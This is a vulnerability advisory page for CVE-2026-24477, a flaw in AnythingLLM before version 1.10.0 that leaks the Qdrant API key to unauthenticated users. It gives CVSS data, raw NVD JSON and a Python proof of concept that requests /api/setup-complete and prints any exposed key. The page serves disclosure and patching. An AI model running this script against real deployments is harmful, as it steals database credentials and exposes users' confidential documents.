Security Vulnerability Report
CVE-2026-24477 CVSS 7.5 HIGH

Published: 2026-01-27 00:15:51
Last Modified: 2026-01-28 15:59:06

Description

AnythingLLM is an application that turns pieces of content into context that any LLM can use as references during chatting. If AnythingLLM prior to version 1.10.0 is configured to use Qdrant as the vector database with an API key, this QdrantApiKey could be exposed in plain text to unauthenticated users via the `/api/setup-complete` endpoint. Leakage of QdrantApiKey allows an unauthenticated attacker full read/write access to the Qdrant vector database instance used by AnythingLLM. Since Qdrant often stores the core knowledge base for RAG in AnythingLLM, this can lead to complete compromise of the semantic search / retrieval functionality and indirect leakage of confidential uploaded documents. Version 1.10.0 patches the issue.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:mintplexlabs:anythingllm:*:*:*:*:*:*:*:* - VULNERABLE
AnythingLLM < 1.10.0 (when using Qdrant with API key)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import json

# CVE-2026-24477 PoC - AnythingLLM QdrantApiKey Leakage
# Target: AnythingLLM < 1.10.0 with Qdrant vector database configured
target_url = "http://target:3001/api/setup-complete"

try:
    # The endpoint is reachable without authentication on affected versions
    response = requests.get(target_url, timeout=10)
    if response.status_code == 200:
        data = response.json()
        print(f"[+] Status Code: {response.status_code}")
        print(f"[+] Response: {json.dumps(data, indent=2)}")

        # Check for QdrantApiKey in response
        if 'qdrantApiKey' in str(data):
            print("\n[!] VULNERABLE: QdrantApiKey exposed in response!")
            # Extract the key if present
            if isinstance(data, dict):
                for key, value in data.items():
                    if 'qdrant' in str(key).lower() and 'key' in str(key).lower():
                        print(f"[+] Found: {key} = {value}")
        else:
            print("[-] QdrantApiKey not found in response (possibly patched)")
    else:
        print(f"[-] Request failed with status: {response.status_code}")
except requests.exceptions.RequestException as e:
    print(f"[-] Connection error: {e}")
```

References

https://github.com/Mintplex-Labs/anything-llm/security/advisories/GHSA-gm94-qc2p-xcwf (Vendor Advisory, Exploit)
Weakness: CWE-201

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-24477", "sourceIdentifier": "[email protected]", "published": "2026-01-27T00:15:51.150", "lastModified": "2026-01-28T15:59:06.483", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "AnythingLLM is an application that turns pieces of content into context that any LLM can use as references during chatting. If AnythingLLM prior to version 1.10.0 is configured to use Qdrant as the vector database with an API key, this QdrantApiKey could be exposed in plain text to unauthenticated users via the `/api/setup-complete` endpoint. Leakage of QdrantApiKey allows an unauthenticated attacker full read/write access to the Qdrant vector database instance used by AnythingLLM. Since Qdrant often stores the core knowledge base for RAG in AnythingLLM, this can lead to complete compromise of the semantic search / retrieval functionality and indirect leakage of confidential uploaded documents. Version 1.10.0 patches the issue."}, {"lang": "es", "value": "AnythingLLM es una aplicación que convierte fragmentos de contenido en contexto que cualquier LLM puede usar como referencias durante el chat. Si AnythingLLM anterior a la versión 1.10.0 está configurado para usar Qdrant como la base de datos vectorial con una clave API, esta QdrantApiKey podría quedar expuesta en texto plano a usuarios no autenticados a través del endpoint `/api/setup-complete`. La fuga de QdrantApiKey permite a un atacante no autenticado acceso completo de lectura/escritura a la instancia de la base de datos vectorial Qdrant utilizada por AnythingLLM. Dado que Qdrant a menudo almacena la base de conocimiento central para RAG en AnythingLLM, esto puede llevar a un compromiso completo de la funcionalidad de búsqueda semántica / recuperación y a la fuga indirecta de documentos confidenciales cargados. La versión 1.10.0 corrige el problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-201"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mintplexlabs:anythingllm:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.10.0", "matchCriteriaId": "8DEA04F2-1EE6-4943-B989-76CB56A33BC2"}]}]}], "references": [{"url": "https://github.com/Mintplex-Labs/anything-llm/security/advisories/GHSA-gm94-qc2p-xcwf", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}
```